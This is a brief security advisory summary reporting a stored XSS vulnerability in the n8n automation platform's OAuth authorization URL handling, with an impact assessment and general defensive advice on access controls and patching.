OAuth vulnerability in n8n automation platform could lead to system compromise
Summary
Researchers at Imperva have discovered a stored XSS vulnerability in the n8n automation platform due to improper sanitization of OAuth authorization URLs. Attackers with access to a victim's n8n system could exploit this to exfiltrate credentials and potentially compromise the entire platform.
IFF Assessment
This vulnerability allows attackers to compromise an automation platform, which could lead to the exfiltration of multiple credentials and a wider system compromise.
Defender Context
This vulnerability highlights the security risks associated with centralized automation platforms like n8n, which often act as a central point of trust for accessing multiple services. Defenders should treat such platforms as critical assets, implement strict access controls, and ensure prompt patching to mitigate the impact of potential exploits.